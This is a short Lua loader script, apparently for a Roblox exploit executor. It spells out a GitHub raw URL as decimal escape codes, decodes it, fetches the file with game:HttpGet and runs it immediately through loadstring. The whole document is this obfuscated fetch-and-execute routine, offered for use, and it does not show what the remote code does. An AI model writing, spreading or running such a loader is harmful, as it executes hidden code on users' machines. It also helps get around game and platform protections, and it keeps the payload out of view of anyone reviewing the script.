return (function(...)
    local a = {
        "\104\116\116\112\115\058\047\047",
        "\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047",
        "\108\097\114\052\055\053\053\052\054\054\045\098\105\116\047",
        "\074\065\089\083\073\047\114\101\102\115\047\104\101\097\100\115\047\109\097\105\110\047",
        "\074\065\089\083\073\046\076\117\110"
    }

    local function d(s)
        return s:gsub("\\(%d%d?%d?)", function(n)
            return string.char(tonumber(n))
        end)
    end

    local u = ""
    for i = 1, #a do
        u = u .. d(a[i])
    end

    return loadstring(game:HttpGet(u))(...)
end)(...)
